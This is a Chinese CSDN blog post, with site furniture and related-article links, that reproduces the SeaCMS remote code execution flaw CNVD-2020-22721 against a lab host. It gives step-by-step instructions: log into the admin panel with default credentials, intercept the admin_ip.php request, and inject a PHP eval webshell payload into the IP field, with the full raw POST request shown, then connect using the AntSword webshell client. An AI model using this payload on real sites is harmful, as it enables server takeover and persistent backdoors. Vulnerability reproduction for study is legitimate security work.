WEB漏洞之:海洋CMS代码执行(CNVD-2020-22721)

最新推荐文章于 2024-02-21 14:08:38 发布
最新推荐文章于 2024-02-21 14:08:38 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: web安全漏洞复现 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39762176/article/details/127930745
版权

漏洞环境说明
海洋CMS是一款视频类cms,本次复现海洋cms远程命令执行漏洞 漏洞编号:CNVD-2020-22721CNVD-2020-22721
首先登录后台地址为//manager 默认用户名和密码admin。
在这里插入图片描述
进入后台之后,找到IP安全设置选项 目录为:admin_ip.php
在这里插入图片描述
打开Burp Suite工具,开始拦截数据包。
结尾添加webshell
在这里插入图片描述

";eval($_POST[password]);//

POST数据包

POST http://192.168.17.133:54935/manager/admin_ip.php?action=set HTTP/1.1
Host: 192.168.17.133:54935
Content-Length: 17
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.17.133:54935
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.17.133:54935/manager/admin_ip.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h619avhk72f9uqmvih79nv2695
Connection: close

v=0&ip=+127.0.0.1";eval($_POST[password]);//

使用蚁剑连接。
在这里插入图片描述
在这里插入图片描述
至此漏洞复现完成。

im-Miclelson
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
海洋cms漏洞——search.php
qq_40554015的博客
02-13 5079
在i春秋做CTF的题,有一道“百度杯”CTF比赛 九月场的题叫做Test,是web类型。 打开发现是海洋CMS: 看到是cms,立马搜了一下海洋CMS漏洞,发现网上很多,主要是search.php存在漏洞。 开始解题: 1.在查询栏随便点一个: 看到这么一个url,可以构造一个payload: 不是很清楚为什么······ 2.菜刀连接 接下来就可以直接用菜刀连接了 没有flag,应该在数据库中, 找到search.php,打开看看: 发现包含了common.php
Seacms代码审计小结(后台多处getshell)1
08-03
在框架中,有很多是写的是以 txt 结尾的件,这种直接读是法以 php 来解析,但是如果找到处件包含的漏洞,让他包含的是这种我们可以修改的件,那就也可以造成代码
ocean:使用数字海洋云平台和Droplet(VM)进行渗透测试自动化
04-03
海洋 使用数字海洋云平台和Droplet(VM)进行渗透测试自动化。 它提供了一种以高效,经济的方式轻松地为各种目的在数字海洋中轻松配置渗透测试VM的方法,例如: 使用黑客工具 设置代理以与代理链一起使用 通过小滴传输隧道 设置 使用pip3安装此python3软件包:pip3 install ocean-pentest 使用我的推荐链接在Digital Ocean创建一个帐户(您和我都会获得免费信用): : 从帐户页面获取API密钥,并将其放入计算机上的环境变量(digitalocean_token)。 您可以构建自己的自定义映像,并使用以下过程进行上传: : 我自己对此的指示即将到来。 对于自定义图像,您需要将计算机的ID放入环境变量(digitalocean_image)。 您可以使用“ ocean --image#image_name#”从您的帐户中检索此信息。
Seacms最新版本注入实战+后台RCE成功getshell-2018年老文章
J0o1ey Blog
06-21 5803
有技术培训需求/技术交流/代码审计需求/的朋友可以联系QQ547006660 0X001海洋CMS简介# 海洋cms是为解决站长核心需求而设计的视频内容管理系统,一套程序自适应电脑、手机、平板、APP多个终端入口,无任何加密代码、安全有保障,是您最佳的建站工具。——来自seacms官网(简而言之就是专门搭建看片网站的cms) 呵呵,安全有保障??头都给你打爆掉,百度搜索seacms。。漏洞信息...
SeaCMS远程命令执行(CNVD-2020-22721)
最新发布
m0_65150886的博客
02-21 238
SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,可以直接写入文件。后台路径:/manager 后台密码:admin:admin。2.访问http://ip:port/manager ,进入后台登录页面。海洋CMS是一个自适应电脑、手机、平板、APP多个终端入口的程序。1.访问http://ip:port,出现如下页面,开始实验。5.点击确认,并通过burp进行抓包,修改post请求。3.输入账号密码,进行登录。
WEB 漏洞:seacms 远程命令执行CNVD-2020-22721)
2301_79118231的博客
10-27 478
注:个人笔记,并不全面,仅供参考。
漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721
10-15 1546
【seaCms-命令执行】后门代码写入可解析文件中
CVE-2020-21378(seacms后台SQL注入) 分析
RestoreJustice的博客
03-16 1096
变量没有经过什么过滤就直接插入到SQL语句中(360webscan.php会使用正则规则对注册的变量会进行检查,但对$id并没有任何检查),也没有引号包裹,十分好利用。在seacms v10.1版本中,在sql.class.php中GetOne中加入了对SQL语句的安全检查(上面的注入语句这里用不了)绕过方法参考https://xz.aliyun.com/t/2828#toc-3。下面这里的这个检查与先前审计过的duomicms的检查函数一样,是以单引号为界,把第一个引号前的语句给。
CNVD-2020-22721】seaCms命令执行漏洞
qq_46487664的博客
07-27 134
SeaCMS v12.9存在命令执行漏洞,在manager/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。
seacms海洋cms漏洞
YouthBelief的博客
10-29 5279
seacms海洋cms漏洞前言一、seacms 远程命令执行CNVD-2020-22721)0x01 漏洞描述0x02 漏洞利用拿shell总结 前言 海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 一、seacms 远程命令执行CNVD-2020-22721) 0x01 漏洞描述 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台
漏洞复现】海洋CMS6.28远程代码执行
weixin_47443077的博客
05-17 2172
漏洞复现】海洋CMS6.28远程代码执行 文章目录【漏洞复现】海洋CMS6.28远程代码执行一、漏洞背景二、漏洞原理三、漏洞复现 一、漏洞背景 海洋影视管理系统(seacms海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 该CMS6.28版本存在命令执行漏洞,攻击者可以通过远程命令执行入侵被攻击者主机。 二、漏洞原理 area参数处理过的地方经过字符是否非法判断之后,调用ech
CNVD-2020-10487-Tomcat-ajp-POC:CNVD-2020-10487(CVE-2020-1938),tomcat ajp文件读取长度poc
03-08
CNVD-2020-10487-Tomcat-Ajp-lfi-POC CNVD-2020-10487(CVE-2020-1938),tomcat ajp lfi poc注意:poc.py仅在python2.7上运行,不支持python 3+ 用法:pip install -r requirements.txt python poc.py -p 8009 -f“ /WEB-INF/web.xml” 127.0.0.1
Docker学习基础
09-06
从零学Docker 讲的很简单 很方便 docker起步必备!!!!
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 ...拿到CNVD-2020-10487-Tomcat-Ajp-lfi.py测
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
向日葵RCE漏洞CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
CNVD-2021-17369 smartweb管理系统管理员密码泄露.md
04-11
CNVD-2021-17369 smartweb管理系统管理员密码泄露
[渗透测试篇一]:基础
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
04-16 758
目录 常见的术语 渗透测试流程: 学习环境的配置 HTTP协议 网站搭建配置 常见的术语 1、脚本(asp,php,jsp)前台不可见 2、html(css,js,html) 解释语言,前台可见(右键-检查,F12) 3、HTTP协议 4、CMS(B/S)内容管理系统, 内容管理系统(content management system,CMS)是一种位于WEB ...
cnvd-2020-10487-tomcat-ajp-lfi
10-21
cnvd-2020-10487-tomcat-ajp-lfi是一种利用Tomcat中Apache JServ协议(AJP)的本地文件包含(LFI)漏洞。该漏洞允许攻击者在服务器上执行任意的文件读取和执行操作,从而可能导致敏感信息泄露、甚至服务器完全受控。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值